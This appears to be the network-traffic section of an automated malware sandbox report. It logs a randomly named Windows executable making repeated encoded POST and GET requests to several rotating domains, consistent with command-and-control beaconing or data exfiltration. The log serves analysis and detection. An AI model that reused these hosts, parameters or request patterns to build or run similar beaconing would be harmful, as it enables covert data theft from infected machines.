Nov 22, 2024 15:12:22.001300097 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:21 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49796 | 194.76.119.60 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:12:23.175431967 CET | 10735 | OUT | POST /qx5d/ HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.cstrategy.online
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.cstrategy.online/qx5d/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Nov 22, 2024 15:12:24.484096050 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:24 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49802 | 194.76.119.60 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:12:25.827003956 CET | 359 | OUT | GET /qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1+y7QK+I5LuF7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvprNVphaqp6upu86OQyU68aVNw4H3NL9j/8=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Nov 22, 2024 15:12:27.183223009 CET | 531 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1+y7QK+I5LuF7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvprNVphaqp6upu86OQyU68aVNw4H3NL9j/8=&o6=SpTPojpx7H
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49823 | 103.224.182.242 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:12:33.679647923 CET | 615 | OUT | POST /6ou6/ HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.madhf.tech
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.madhf.tech/6ou6/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSAx+8RescENop1xVPFGIEBZALIdn8vQX+A==
Nov 22, 2024 15:12:34.959163904 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:34 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284754.2783085; expires=Mon, 20-Nov-2034 14:12:34 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 576
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49829 | 103.224.182.242 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:12:36.347232103 CET | 635 | OUT | POST /6ou6/ HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.madhf.tech
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.madhf.tech/6ou6/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB9zWPUTxstelGbGVMqEPegDAZYi9WuoFi8=
                                                                                                                          Nov 22, 2024 15:12:37.663254976 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:37 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284757.5675792; expires=Mon, 20-Nov-2034 14:12:37 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 576
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          7 | 192.168.2.4 | 49835 | 103.224.182.242 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:12:39.003422976 CET | 10717 | OUT | POST /6ou6/ HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.madhf.tech
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.madhf.tech/6ou6/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:40.360388041 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:40 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284760.2043783; expires=Mon, 20-Nov-2034 14:12:40 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 576
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          8 | 192.168.2.4 | 49841 | 103.224.182.242 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:12:41.652867079 CET | 353 | OUT | GET /6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY= HTTP/1.1
                                                                                                                          Host: www.madhf.tech
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:42.993855953 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                          date: Fri, 22 Nov 2024 14:12:42 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1732284762.3968677; expires=Mon, 20-Nov-2034 14:12:42 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-length: 1472
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text=
                                                                                                                          Nov 22, 2024 15:12:42.993959904 CET | 508 | IN |
                                                                                                                          Data Ascii: "#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY=&fp=-3'>Click here to enter<


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          9 | 192.168.2.4 | 49857 | 104.21.58.90 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:12:48.458190918 CET | 627 | OUT | POST /v89f/ HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bser101pp.buzz
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:49.732104063 CET | 961 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:49 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ExXGxVIp2ZMU2E%2FTyHRW1RD9gnnczn%2BJqS7%2BunlbQOoFvujy1wGLzJjTT9zGMOcQV%2FV4E%2B6rGYhjLxAtn%2F6xAuJ0%2BaS2XwgMetJW7HB1sj%2BNe3OD8ig3PX0lI%2BWjaofse6bE9n4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e6984411928159b-EWR
                                                                                                                          Content-Encoding: gzip
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=627&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          10 | 192.168.2.4 | 49863 | 104.21.58.90 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:12:51.127619028 CET | 647 | OUT | POST /v89f/ HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bser101pp.buzz
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:52.362478018 CET | 945 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:52 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpjdmCjOtmi6O3l0NAvsmt3hhYhEz2dVfeKcounSOmSSQ4RMyKOrF0TnN3SVZBXzuMXlYKVqDBkRocx0A3RrCvoO0FsWvzxbOBi8ExrY494jRvCgF2%2BqW0rwDKuE7DEduOkF5sw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e6984517b38430a-EWR
                                                                                                                          Content-Encoding: gzip
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=647&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          11 | 192.168.2.4 | 49871 | 104.21.58.90 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:12:53.785161018 CET | 10729 | OUT | POST /v89f/ HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bser101pp.buzz
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:54.955177069 CET  952                IN         HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:54 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmtaxxdIQAoErVBf8Vv23IYJkyG3KpEmmy8ShcQPICxBhZg6q1BxTEvPZjCQeECByRY0SNqMPMXvy%2Fl7t4lF0OfeSjj6iTlokc%2FDlM5rhcLTQgjYrP2icGzDmry51CqdZAcyg%2FI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e698461d8568cee-EWR
                                                                                                                          Content-Encoding: gzip
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1831&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10729&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                          12          192.168.2.4  49879        104.21.58.90    80                3104  C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                                                                          Nov 22, 2024 15:12:56.517148018 CET  357                OUT        GET /v89f/?Mr60=vR3kWP+v98PFeIQUj3bnjAJ1ckGUCiAryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2Lg1hTzUbXWqWgu/JIX+7IudMx93vwrkJY0=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:57.712625027 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:57 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmDkL9SZCD6P9Ur0Wxy5m2bP4Tp6Z517UhkhobWGiH%2B9Ivi19wVPnqdfrLFsLn3cNwlW72O527HKjJlMmA8DfxFDyn19%2FqHuOv0Ck6nOglP8VsQdKIg4gFX560qnFPtDx6BJ1Xw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e6984730f1f41ad-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11291&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=357&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->...
                                                                                                                          Nov 22, 2024 15:12:57.712666035 CET  65                 IN         Data Raw: 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a
                                                                                                                          Data Ascii: a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                          Nov 22, 2024 15:12:57.712982893 CET  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                          13          192.168.2.4  49893        3.33.130.190    80                3104  C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                                                                          Nov 22, 2024 15:13:03.368961096 CET  648                OUT        POST /8m07/ HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.goldstarfootwear.shop
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/iuIDML+wMsyhAnW74q5JIjeo9dmnwEsQdA==


                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                          14          192.168.2.4  49902        3.33.130.190    80                3104  C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                                                                          Nov 22, 2024 15:13:06.038191080 CET  668                OUT        POST /8m07/ HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.goldstarfootwear.shop
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeaj6bgavT9HRZGL40Zw1QME3kAjQEJTFq9yc=


                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                          15          192.168.2.4  49908        3.33.130.190    80                3104  C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                                                                          Nov 22, 2024 15:13:08.709234953 CET  10750              OUT        POST /8m07/ HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.goldstarfootwear.shop
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36


                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                          16          192.168.2.4  49914        3.33.130.190    80                3104  C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                                                                          Nov 22, 2024 15:13:11.377552986 CET  364                OUT        GET /8m07/?o6=SpTPojpx7H&Mr60=2dHIoPS/8uSmn0UTpxXBmuXgzQfGtnFv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrQZLN2Jh+RnltKoXALFEyxyCbEquQJUaCWgU= HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:13:12.517416954 CET  394                IN         HTTP/1.1 200 OK
                                                                                                                          Server: openresty
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:12 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 254
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o6=SpTPojpx7H&Mr60=2dHIoPS/8uSmn0UTpxXBmuXgzQfGtnFv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrQZLN2Jh+RnltKoXALFEyxyCbEquQJUaCWgU="}</script></head></html>


                                                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                          17          192.168.2.4  49930        161.97.142.144  80                3104  C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                                                                          Nov 22, 2024 15:13:18.212018967 CET  624                OUT        POST /6m2n/ HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.070002018.xyz
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.070002018.xyz/6m2n/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=VyR7xEiQABko0VBoUjyiu47MXs3tB6HsNr8Og9ToyHrG6nMo6/aeuvV9KYdN/XdBMZ2sLtSrcrU7uOH7Qm97/Yde+VEYPTUd7FNKvYdC15LHeuhLpPFlErWsmRHWN6/Z51fznt+fGZJNdyGVLmW+Ri5kbdyDuyx99GFs6y4F4z82FJF9voM/ZxQKJzPPlSeq2g==
